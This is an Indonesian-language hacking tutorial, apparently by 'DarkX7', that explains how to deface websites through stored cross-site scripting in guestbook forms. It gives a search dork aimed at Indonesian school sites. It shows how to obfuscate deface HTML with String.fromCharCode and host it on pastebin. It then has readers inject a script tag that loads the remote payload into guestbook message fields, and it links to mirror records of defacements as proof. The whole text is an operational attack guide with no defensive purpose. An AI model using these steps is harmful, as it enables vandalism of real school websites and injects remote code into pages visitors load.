Deface dengan PoC JSO - DarkX7

Deface dengan metode JSO

DORK: inurl:/bukutamu.html site:sch.id (bisa dikembangkan lagi)

Kalau sudah menemukan target, maka kita harus mempunyai script deface jso terlebih dahulu.

Caranya adalah dengan menyiapkan script deface masing" (ext.html) lalu pergi ke web http://jdstiles.com/java/cct.html

Copy semua script deface html kalian, lalu paste pada bagian/kolom "Web Design"

Setelah, mempaste tinggal mengklik "CharcodeAt()"

Maka langsung muncul kode/angka pada bagian kolom sebelah kanan. Lalu, kalian copy lagi hasil/charcodenya.

Nah, tinggal disisipkan ke script ini : document.documentElement.innerHTML=String.fromCharCode(pastekan kode disini)

Contoh : document.documentElement.innerHTML=String.fromCharCode(60, 104, 116, 109, 108, 32, 100, 105, 114, 61, 34, 114, 116, 108, 34, 62, 10, 10)

Setelah itu, pergi ke https://pastebin.com/  Buat New Paste, lalu paste kode yg diatas ini kedalam kolom.

Save New Pastenya lalu klik "raw", paste lagi link raw pastebinnya kedalam script ini, Contoh:<script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script>

Selesai, deh ngebuat script JSOnya tinggal ngedeface..

Pertama, Dorking dulu cari yang vuln. Lalu, Register/Daftar untuk mengisi bukutamu.

Isi aja asal-asalan, yg penting paste/masukkan script ini di bagian/kolom "Pesan/Message/Info"

 <script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script> 

Jika vuln, maka tampilan akan langsung berubah..

Contoh Hasil Deface dengan JSO:

https://mirror-h.org/zone/2247930/

https://mirror-h.org/zone/2247924/